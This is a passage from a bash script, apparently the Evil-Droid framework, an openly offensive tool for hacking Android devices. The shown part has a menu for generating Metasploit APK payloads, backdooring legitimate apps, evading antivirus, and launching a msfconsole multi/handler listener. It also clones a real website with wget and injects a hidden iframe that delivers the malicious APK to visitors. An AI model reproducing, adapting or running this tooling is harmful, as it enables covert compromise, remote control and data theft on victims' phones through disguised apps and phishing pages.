ORIGINAL-APK) orig_apk;spinlong;gen_payload;spinlong;up_apktook;apk_decomp1;spinlong;apk_decomp;flagg_original;spinlong;apk_comp1;spinlong;sign;return;;
esac
done
}
#function listeners
function listener()
{
xterm -T "EVIL-DROID MULTI/HANDLER" -fa monaco -fs 10 -bg black -e "msfconsole -x 'use multi/handler; set LHOST $lanip; set LPORT $LPORT; set PAYLOAD $PAYLOAD; exploit'"
}
#function clone site
function clns()
{
clone=$(zenity --title "☢ CLONE WEBSITE ☢" --text "PASTE LINK WEBSITE TO CLONE" --entry --width 400 2> /dev/null)
}
function index_name()
{
index=$(zenity --title "☢ INDEX NAME ☢" --text "example: wtf.html" --entry --entry-text "wtf" --width 300 2> /dev/null)
echo -e $yellow ""
echo "[*] Clone Website From URL..."
spinlong
wget $clone --no-check-certificate -O $index.html -c -k -U "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko/20100101 Firefox/33.0" > /dev/null 2>&1
}
function launcher()
{
echo '<iframe id="frame" src="evil.apk" application="yes" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no>></iframe><script type="text/javascript">setTimeout(function(){window.location.href="http://local-ip";}, 15000);</script></body></html>' | sed "s|evil.apk|$apk_name.apk|" | sed "s|local-ip|$LHOST/$index.html|" >> apk_index
com=`cat apk_index`
rep="</body></html>"
sed "s|$rep|$com|" $index.html > index2.html
mv index2.html /var/www/html/$index.html > /dev/null 2>&1
cp $path/evilapk/$apk_name.apk /var/www/html > /dev/null 2>&1
rm apk_index > /dev/null 2>&1
rm $index.html > /dev/null 2>&1
zenity --title "☢ SITE CLONED ☢" --info --text "http://$LHOST/$index.html" --width 400 > /dev/null 2>&1
}
#function attack verctor
function atkv()
{
while true; do
echo ""
atk_v=$(zenity --list --title "☢ EVIL-DROID OPTIONS ☢" --text "Choose an option bellow:" --radiolist --column "Choose" --column "Option" TRUE "Multi-Handler" FALSE "Attack-Vector" FALSE "Main-Menu" FALSE "Exit" --width 305 --height 270 2> /dev/null)
case $atk_v in
Multi-Handler) listener;suite;;
Attack-Vector) clns;spinlong;index_name;launcher;listener;suite;;
Main-Menu) clear;main;;
Exit) echo -e $yellow "";apache_svc_stop;postgresql_stop;echo " Good Bye !!";echo "";exit;;
esac
done
}
#function suite
function suite()
{
while true; do
echo ""
suit=$(zenity --list --title "☢ EVIL-DROID OPTIONS ☢" --text "Would you like to continue?" --radiolist --column "Choose" --column "Option" TRUE "Main-Menu" FALSE "Exit" --width 305 --height 270 2> /dev/null)
case $suit in
Main-Menu) clear;main;;
Exit) echo -e $yellow "";apache_svc_stop;postgresql_stop;echo " Good Bye !!";echo "";exit;;
esac
done
}
#function clean files
function clean()
{
rm $directory/* > /dev/null 2>&1
rm $path/*.jpeg > /dev/null 2>&1
rm $path/*.txt > /dev/null 2>&1
rm /var/www/html/*.apk > /dev/null 2>&1
rm /var/www/html/$index.html > /dev/null 2>&1
}
start=$(zenity --question --title="☢ Evil-Droid Framework ☢" --text "Execute framework and Services?" --width 270 2> /dev/null)
if [ "$?" -eq "0" ]; then
apache_svc_start
postgresql_start
else
clear
echo ""
echo -e $lightgreen "╔──────────────────────────────────────────────╗"
echo -e $lightgreen "| Author: Mascerano Bachir |"
echo -e $lightgreen "| Evil-Droid Framework $ver - Dev-labs.co |"
echo -e $lightgreen "| Credits to : MrPedroubuntu , Kader Achraf |"
echo -e $lightgreen "| , youcef yahia |"
echo -e $lightgreen "| and Mohammed Yacine |"
echo -e $lightgreen "┖──────────────────────────────────────────────┙"
echo ""
apache_svc_stop
postgresql_stop
exit
fi
clear
#main menu
function main()
{
while :
do
print_ascii_art
echo -e $green ""
echo "╔──────────────────────────────────────────────╗"
echo "| Evil-Droid Framework $ver |"
echo "| Hack & Remote android plateform |"
echo "┖──────────────────────────────────────────────┙"
echo "[1] APK MSF "
echo "[2] BACKDOOR APK ORIGINAL (OLD) "
echo "[3] BACKDOOR APK ORIGINAL (NEW) "
echo "[4] BYPASS AV APK (ICON CHANGE) "
echo "[5] START LISTENER "
echo "[c] CLEAN "
echo "[q] QUIT "
read -p "[?] Select>: " option
echo
case "$option" in
1) echo -e $lightgreen "[✔] APK MSF"
echo -e $green
get_lhost
get_lport
echo
payload_name
get_payload
echo
spinlong
gen_payload
mv $apk_name.apk $path/evilapk > /dev/null 2>&1
error0
sleep 2
echo ""
zenity --title "☢ EVIL-DROID ☢" --info --text "APK PAYLOAD : $path/evilapk/$apk_name.apk " --width 400 > /dev/null 2>&1
atkv
echo
;;
2) echo -e $lightgreen "[✔] BACKDOOR APK ORIGINAL (OLD)"
echo -e $green
get_lhost
get_lport
echo
payload_name
get_payload
echo
orig_apk
echo
spinlong
up_apktook
embed_payload
echo
mv $apk_name.apk $path/evilapk > /dev/null 2>&1
error
sleep 2
echo ""
zenity --title "☢ EVIL-DROID ☢" --info --text "BACKDOORED APK : $path/evilapk/$apk_name.apk " --width 400 > /dev/null 2>&1
atkv
echo
;;
3) echo -e $lightgreen "[✔] BACKDOOR APK ORIGINAL (NEW)"
echo -e $green
get_lhost
get_lport
echo
payload_name
get_payload
echo
orig_apk
echo
spinlong
gen_payload
up_apktook
apk_decomp1
apk_decomp
perms
hook_smalies
spinlong
apk_comp1
sign
echo
mv $apk_name.apk $path/evilapk > /dev/null 2>&1
error
sleep 2
echo ""
zenity --title "☢ EVIL-DROID ☢" --info --text "BACKDOORED APK : $path/evilapk/$apk_name.apk " --width 400 > /dev/null 2>&1
atkv
echo
;;
4) echo -e $lightgreen "[✔] BYPASS AV APK"
echo -e $green
get_lhost
get_lport
echo
payload_name
get_payload1
echo
quests
mv $apk_name.apk $path/evilapk > /dev/null 2>&1
error
sleep 2
echo
zenity --title "☢ EVIL-DROID ☢" --info --text "APK SIGNED : $path/evilapk/$apk_name.apk " --width 400 > /dev/null 2>&1
atkv
echo
;;
5) echo -e $lightgreen "[✔] START LISTENER"
echo -e $green
get_lhost
get_lport
echo
get_payload
echo
listener
suite
echo
;;
c) echo -e $lightgreen "[✔] clean up all files"
echo
clean
echo
zenity --title "☢ EVIL-DROID ☢" --info --text "All Files Are Removed " --width 400 > /dev/null 2>&1
echo
clear
;;
q) echo -e $yellow " Good Bye !!"
apache_svc_stop
postgresql_stop
echo
exit 0
;;
*) echo -e $red "【X】 Invalid option, please write a valid number【X】"
echo
sleep 2
;;
esac
done
}
main
You can’t perform that action at this time.